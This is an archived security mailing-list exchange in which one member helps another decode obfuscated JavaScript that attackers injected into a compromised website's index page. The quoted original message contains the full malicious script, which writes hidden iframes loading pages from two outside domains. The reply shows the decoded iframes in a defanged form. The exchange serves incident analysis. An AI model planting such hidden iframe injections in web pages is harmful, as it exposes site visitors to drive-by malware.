Steve,
See the URL http://samspade.org/d/javascript.html for a possible way of
decoding this specific obfuscation. The 'Edit the Source' section seemed
to work for me in this specific case. The result I got is below. Just
replace '_' with '<' ... that's me just making sure this stuff isn't
run.
_iframe width=1 height=1 border=0 frameborder=0
src='http://bensax.info/index2.html'>
_/iframe>
_iframe src="http://zlo-x.net/XDS/iframe.php" width=0 height=0 border=0>
_/iframe>
Hmmm, nothing like a good old fashion iframe to mess people up. I'll
leave it to you to follow the breadcrumbs. As always, do this kind of
work in a sandbox and/or on an isolated system that can be rebuilt.
I know there are much more skilled people out there than myself that can
and will provide you with more assistance.
Ken
> -----Original Message-----
> From: list-bounces at lists.dshield.org> [mailto:list-bounces at lists.dshield.org] On Behalf Of Steve West
> Sent: Sunday, September 02, 2007 3:12 AM
> To: list at lists.dshield.org> Subject: [Dshield] Need help decoding hackers javascript code
>> Hi,
>> Just found some hackers who have replaced the index.html with the
> following code below. I'm wondering if anyone knows of a tool
> I can use
> to safely decode the following:
>> <meta name="robots" content="all" /><SCRIPT LANGUAGE="JavaScript">
> <!--
> function Decode(){var temp="",i,c=0,out="";var
> str="60!105!102!114!97!109!101!32!119!105!100!116!104!61!49!32
> !104!101!105!103!104!116!61!49!32!98!111!114!100!101!114!61!48
> !32!102!114!97!109!101!98!111!114!100!101!114!61!48!32!115!114
> !99!61!39!104!116!116!112!58!47!47!98!101!110!115!97!120!46!10
> 5!110!102!111!47!105!110!100!101!120!50!46!104!116!109!108!39!
> 62!60!47!105!102!114!97!109!101!62!13!10!";l=str.length;while(
> c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt
> (c++);c++;out=out+String.fromCharCode(temp);temp="";}document.
> write(out);}
> //-->
> </SCRIPT><SCRIPT LANGUAGE="JavaScript">
> <!--
> Decode();
> //-->
> </SCRIPT>
> <meta name="revisit-after" content="1 days" /><script
> type="text/javascript">document.write('\u003c\u0069\u0066\u007
> 2\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068\
> u0074\u0074\u0070\u003a\u002f\u002f\u007a\u006c\u006f\u002d\u0
> 078\u002e\u006e\u0065\u0074\u002f\u0058\u0044\u0053\u002f\u006
> 9\u0066\u0072\u0061\u006d\u0065\u002e\u0070\u0068\u0070\u0022\
> u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0030\u0020\u0068\u0
> 065\u0069\u0067\u0068\u0074\u003d\u0030\u0020\u0062\u006f\u007
> 2\u0064\u0065\u0072\u003d\u0030\u003e\u003c\u002f\u0069\u0066\
> u0072\u0061\u006d\u0065\u003e')</script>
>> --
> thx,
>> SW
>
_______________________________________________________________________
This e-mail and any files transmitted with it are proprietary and intended solely for the use of the individual or entity to whom they are addressed. If you have reason to believe that you have received this e-mail in error, please notify the sender and destroy this email and any attached files. Please note that any views or opinions presented in this e-mail are solely those of the author and do not necessarily represent those of the Curtiss-Wright Corporation or any of its subsidiaries. Documents attached hereto may contain technology subject to government export regulations. Recipient is solely responsible for ensuring that any re-export, transfer or disclosure of this information is in accordance with applicable government export regulations. The recipient should check this e-mail and any attachments for the presence of viruses. Curtiss-Wright Corporation and its subsidiaries accept no liability for any damage caused by any virus transmitted by this e-mail.